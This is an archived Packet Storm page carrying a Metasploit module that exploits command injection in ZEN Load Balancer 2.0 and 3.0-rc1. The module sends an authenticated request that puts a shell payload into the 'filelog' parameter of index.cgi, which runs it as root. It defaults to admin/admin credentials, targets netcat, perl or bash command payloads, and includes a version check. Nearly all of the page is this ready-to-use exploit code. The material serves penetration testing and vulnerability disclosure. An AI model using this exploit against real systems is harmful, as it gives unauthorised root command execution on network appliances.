exploit the possibilities

ZEN Load Balancer Filelog Command Execution

ZEN Load Balancer Filelog Command Execution
Posted Sep 22, 2012
Authored by Brendan Coles | Site metasploit.com

This Metasploit module exploits a vulnerability in ZEN Load Balancer version 2.0 and 3.0-rc1 which could be abused to allow authenticated users to execute arbitrary code under the context of the 'root' user. The 'content2-2.cgi' file uses user controlled data from the 'filelog' parameter within backticks.

tags | exploit, arbitrary, cgi, root
MD5 | a4735e1bfb0a32b50337c1b4747c24a2

ZEN Load Balancer Filelog Command Execution

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})
super(update_info(info,
'Name' => "ZEN Load Balancer Filelog Command Execution",
'Description' => %q{
This module exploits a vulnerability in ZEN Load Balancer
version 2.0 and 3.0-rc1 which could be abused to allow authenticated users
to execute arbitrary code under the context of the 'root' user.
The 'content2-2.cgi' file uses user controlled data from the 'filelog'
parameter within backticks.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brendan Coles <bcoles[at]gmail.com>' # Discovery and exploit
],
'References' =>
[
['URL', 'http://itsecuritysolutions.org/2012-09-21-ZEN-Load-Balancer-v2.0-and-v3.0-rc1-multiple-vulnerabilities/']
],
'DefaultOptions' =>
{
'ExitFunction' => 'none'
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat-e perl bash',
}
},
'Targets' =>
[
['Automatic Targeting', { 'auto' => true }]
],
'Privileged' => true,
'DisclosureDate' => "Sep 14 2012",
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(444),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('USERNAME', [true, 'The username for the application', 'admin']),
OptString.new('PASSWORD', [true, 'The password for the application', 'admin'])
], self.class)
end

def check

@peer = "#{rhost}:#{rport}"

# retrieve software version from config file
print_status("#{@peer} - Sending check")
begin
res = send_request_cgi({
'uri' => '/config/global.conf'
})

if res and res.code == 200 and res.body =~ /#version ZEN\s+\$version=\"(2|3\.0\-rc1)/
return Exploit::CheckCode::Appears
elsif res and res.code == 200 and res.body =~ /zenloadbalancer/
return Exploit::CheckCode::Detected
end

rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
end
return Exploit::CheckCode::Unknown

end

def exploit

@peer = "#{rhost}:#{rport}"
user = datastore['USERNAME']
pass = datastore['PASSWORD']
auth = Rex::Text.encode_base64("#{user}:#{pass}")
cmd = Rex::Text.uri_encode(";#{payload.encoded}&")
lines = rand(100) + 1

# send payload
print_status("#{@peer} - Sending payload (#{payload.encoded.length} bytes)")
begin
res = send_request_cgi({
'uri' => "/index.cgi?nlines=#{lines}&action=See+logs&id=2-2&filelog=#{cmd}",
'headers' =>
{
'Authorization' => "Basic #{auth}"
}
}, 25)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Exploit::Failure::Unreachable, 'Connection failed')
rescue
fail_with(Exploit::Failure::Unknown, 'Sending payload failed')
end

if res and res.code == 401
fail_with(Exploit::Failure::NoAccess, 'Authentication failed')
end

end

end

Comments (1)

RSS Feed Subscribe to this comment feed
powit

Hi Brenda to run this exploit you need to know the super user password in that case the exploit will be the least of the problems for the administrator.

Comment by powit
2012-09-23 18:34:58 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    10 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close